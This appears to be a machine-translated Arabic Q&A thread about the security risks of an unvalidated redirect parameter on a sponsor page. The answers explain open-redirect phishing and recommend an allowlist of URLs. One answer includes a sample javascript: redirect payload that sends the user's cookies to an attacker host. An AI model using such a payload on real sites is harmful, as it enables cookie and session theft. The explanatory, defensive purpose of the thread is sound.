هل يمكنك العثور على مشكلة أمان الويب هنا؟

Question

لدي صفحة ويب تعيد التوجيه إلى صفحة ويب أخرى مثل هذا:

http://www.myOtherServer.com/Sponsor.php?RedirectPage=http://mylink.com/whereIwasgoingtogo.html

ثم تعرض صفحة Sponsor.php إعلانًا يحتوي على رابط يقول "متابعة إلى صفحتك" يرتبط بالصفحة التي تم تمريرها في RedirectPage.هل هناك مشكلات أمنية/انتحال يمكن أن تنشأ من هذا؟ما هي أفضل طريقة للتعامل مع هذا؟(لاحظ أن المستخدم لم يسجل الدخول إلى أي من الموقعين)

Answer 1

إنها مشكلة كبيرة.إذا أرسلت لك رابطًا يبدو كالتالي:

 http://cnn.com/sponsor.php?redirectpage=http://bit.ly/jh2l14

سوف تفكر "أوه، CNN، هذا موقع شرعي"، وستفتحه وتنقر على الرابط "متابعة إلى صفحتك".ومن ثم ستكون موجودًا في أحد المواقع الإباحية الأكثر شرًا على الشبكة وسيكون لديك صوت ذكر ضخم يعلنه لجميع زملائك في العمل. "اللعنة أريد!@$@#$ الخاص بك !(&¤&^$§ حتى لا أستطيع ¡⌐^(!#~~&$^#!@$!!"وسيتعين عليك أن تشرح لرئيسك في العمل "اعتقدت أنها قناة CNN!"

الحفرة هنا سمعتك.عمليات إعادة التوجيه العمياء مثل هذه خطيرة.

وهذا مجرد ثقب واحد.وماذا عن هذا؟

 http://cnn.com/sponsor.php?redirectpage=javascript:location.href='http://attacker.com/' + document.cookie

لقد قمت الآن بتحرير XSS لموقعك وسرقت ملفات تعريف الارتباط الخاصة بالمستخدم الخاص بك.بالتأكيد، أنت تقول أنه لا توجد معلومات تسجيل دخول، ولكن ماذا عن بيانات الجلسة؟أو عندما تضيف معلومات تسجيل دخول لاحقًا، أو يستخدم شخص آخر في شركتك هذه الصفحة بعد مرور عام حيث يتم تسجيل دخول المستخدمين.

Answer 2

وهذا هو بالتأكيد خطرا أمنيا. يجب تجنب استخدام المتغيرات في URL عندما الأمن المعنيين.

وبينما ليس هناك ما هو آمن تماما، وهذا هو وسيلة أفضل بكثير من التعامل مع هذه المشكلة: HTTP: //www.webmasterworld.com/forum88/2910.htm

Answer 3

إذا sponsor.php يسمح لأي قيمة في RedirectPage وتعني الإعلانات تأييد أو تشجيع الناس على التفكير بأنهم على الطريق الصحيح سيكون لكم فتح لها أن تكون جزءا من هجوم التصيد. ما هو أسوأ من ذلك، هل من المحتمل أن تستفيد من تلك الهجمات، والتي من المرجح أن تجعل الناس مستاء نوعا ما.

وحفظ قائمة من عناوين المواقع المسموح بها (أو أنماط يتمكنوا من متابعة) من شأنه أن يقطع شوطا طويلا لمنع حدوث مشاكل.